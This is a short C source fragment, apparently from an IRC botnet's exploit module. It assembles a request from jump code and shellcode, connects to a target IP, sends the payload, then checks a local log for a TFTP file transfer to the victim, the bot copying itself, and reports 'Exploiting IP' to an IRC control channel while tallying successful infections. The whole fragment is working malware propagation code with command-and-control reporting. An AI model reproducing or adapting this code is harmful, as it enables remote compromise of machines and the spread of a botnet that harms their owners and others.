	sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode);

	SOCKET sSock = fsocket(AF_INET, SOCK_STREAM, 0);
	if (sSock == SOCKET_ERROR) {
		free(sc);
		return FALSE;
	}

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons(exinfo.port);
	ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
	memset(ssin.sin_zero, 0, 8);

	if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { // Connect failed, exit 
		free(sc);
		fclosesocket(sSock);
		return FALSE;
	}

	if (fsend(sSock, szRequest, strlen(szRequest)+1,0) == SOCKET_ERROR) {
		free(sc);
		fclosesocket(sSock);
		return FALSE;
	}

	// sc and the socket are released on every exit path from here on
	free(sc);
	fclosesocket(sSock);

	// Success probe: one check of the local log for a TFTP transfer started to exinfo.ip
	Sleep(1000);
	sprintf(sendbuf,"[TFTPD]: File transfer started to IP: %s", exinfo.ip);
	if (searchlog(sendbuf, TRUE)) {
		sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
		if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
		addlog(sendbuf);
		exploit[exinfo.exploit].stats++;
	}

	return TRUE;
}